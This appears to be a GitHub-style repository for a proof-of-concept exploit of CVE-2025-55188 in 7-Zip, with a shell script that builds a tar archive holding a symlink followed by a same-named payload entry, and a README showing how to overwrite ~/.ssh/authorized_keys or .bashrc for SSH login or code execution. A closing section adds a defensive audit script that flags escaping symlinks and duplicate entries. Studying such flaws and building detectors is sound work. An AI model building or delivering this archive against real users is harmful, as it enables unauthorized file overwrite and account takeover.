├── exploit.sh
└── README.md

/exploit.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Builds a tar archive carrying a symlink entry followed by a regular-file
# entry of the same name. A vulnerable 7-Zip creates the symlink first and
# then follows it when writing the second entry, so the payload lands on
# the symlink target (see README, "How it Works").
if [ "$#" -ne 3 ]; then
    echo "Usage: $0 <payload-file> <symlink-target> <output-archive>"
    echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
    exit 1
fi

PAYLOAD="$1"
TARGET="$2"
OUT="$3"

WORKDIR=$(mktemp -d)

# Entry 1: the symlink itself. tar stores the link, it does not follow it.
ln -s "$TARGET" "$WORKDIR/symlink"
tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink

# Entry 2: a regular file with the same name holding the payload. The link is
# removed first; copying onto the link path would follow it on this machine
# (and clobber a local file) instead of creating the payload entry.
rm "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"
tar -rf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink

# Wrap the tar in a .7z container; the victim extracts both layers with 7-Zip.
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null

echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# CVE-2025-55188-7z-exploit
---

# 7-Zip Symlink Arbitrary File Write PoC (CVE-2025-55188)

## Description

This proof-of-concept demonstrates **CVE-2025-55188**, a vulnerability in 7-Zip versions prior to **25.01**.
The flaw occurs because 7-Zip does not properly handle **symbolic links** during extraction: a symlink entry from the archive is created on disk and then followed when a later entry is written, so a crafted archive can overwrite arbitrary files on the target system.

If a victim extracts a malicious archive, the attacker can:

* Overwrite sensitive files (e.g., `.bashrc`, `~/.ssh/authorized_keys`, configuration files).
* Potentially gain code execution or unauthorized access (an `authorized_keys` overwrite grants SSH login with the attacker's key; a `.bashrc` overwrite runs attacker commands at the victim's next interactive shell).

---

## How it Works

1. An attacker creates a symbolic link pointing to a target file outside the extraction directory.
2. The link is added to a tar archive, followed by a regular-file entry with the same name that holds the payload.
3. When the archive is extracted with a vulnerable version of 7-Zip, the symlink is created first and then followed when the payload entry is written, so the payload overwrites the target file.

---

## Requirements

* **7-Zip** version **older than 25.01**.
* The victim extracts the archive with a vulnerable 7-Zip (`7z x`) or another tool that follows symlinks during extraction. `exploit.7z` only wraps `exploit.tar`, so the inner tar must be extracted with 7-Zip as well.
* The extraction location must allow symlink traversal to the intended target file. A relative target such as `../../.ssh/authorized_keys` is resolved from the directory the symlink is extracted into, so it reaches `~/.ssh/authorized_keys` only when extraction happens two directory levels below the home directory (e.g., `~/Downloads/extracted/`). An absolute target does not depend on the extraction location.

---

## Usage

```bash
./exploit.sh <payload-file> <symlink-target> <output-archive>
```

* **payload-file**: File containing the malicious content to write.
* **symlink-target**: Path the symlink points to, i.e. the file to overwrite (e.g., `../../.ssh/authorized_keys`); relative paths are resolved from the extraction directory.
* **output-archive**: Name of the crafted `.7z` archive (it contains the `exploit.tar` that carries the symlink and payload entries).

Example:

```bash
./exploit.sh mykey.pub ../../.ssh/authorized_keys exploit.7z
```

---

## Disclaimer

This PoC is provided **for educational and testing purposes only**.
Do not use it on systems you do not own or have explicit permission to test.
Unauthorized use may violate laws and result in criminal or civil penalties.

---
--------------------------------------------------------------------------------
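## Detecting this archive layout before extraction

The archive layout described under "How it Works" (a symlink entry whose target leaves the extraction directory, followed by a second entry with the same name) can be spotted from tar's listing output alone, without extracting anything. The audit below is an added example and is not part of this PoC or of 7-Zip; the function names `audit_tar` and `archive_is_clean`, and the sample archives built in the usage notes, are this example's own. It relies only on `tar -t` / `tar -tv` output, which both GNU and BSD tar print in the form the parser expects (`l` at the start of the mode string and ` -> ` before the link target).

```sh
#!/bin/sh
# Added example, not part of the PoC: audit a tar archive for the two
# indicators of the symlink-overwrite layout before extracting it.
#   1. a symlink entry whose target is absolute or contains a ".." component
#   2. an entry name that appears more than once (symlink first, payload second)
# Only tar's listing modes (-t, -tv) are used, so nothing is written to disk.
# Function names (audit_tar, archive_is_clean) are this example's own.

# Prints one line per finding; prints nothing for an archive without them.
audit_tar() {
    archive=$1

    # Symlink entries: in -tv output the mode string starts with "l" and the
    # link target follows " -> ".
    tar -tvf "$archive" | while IFS= read -r line; do
        case "$line" in
            l*' -> '*)
                target=${line##* -> }
                case "$target" in
                    /*|..|../*|*/..|*/../*)
                        echo "ESCAPING SYMLINK: $line" ;;
                esac ;;
        esac
    done

    # Duplicate entry names: the later entry is written through whatever the
    # earlier one created, which is the symlink in this PoC.
    tar -tf "$archive" | sort | uniq -d | sed 's/^/DUPLICATE ENTRY: /'
}

# Exit status 0 when audit_tar reports nothing, 1 otherwise.
archive_is_clean() {
    [ -z "$(audit_tar "$1")" ]
}

# Command-line use: sh audit_tar.sh exploit.tar
if [ "$#" -eq 1 ]; then
    if archive_is_clean "$1"; then
        echo "no symlink-overwrite indicators in $1"
    else
        audit_tar "$1"
        exit 1
    fi
fi
```

To audit the PoC's output, extract the outer container first into a scratch directory (it holds only `exploit.tar`, no symlinks), e.g. `7z x exploit.7z -o/tmp/scratch`, then run `sh audit_tar.sh /tmp/scratch/exploit.tar`. On an archive built by `exploit.sh` with the example arguments, the audit reports one `ESCAPING SYMLINK` line for `symlink -> ../../.ssh/authorized_keys` and one `DUPLICATE ENTRY: symlink` line; a plain archive of regular files reports nothing. Absolute-target symlinks are flagged as well, since the check keys on the target string rather than on the extraction directory.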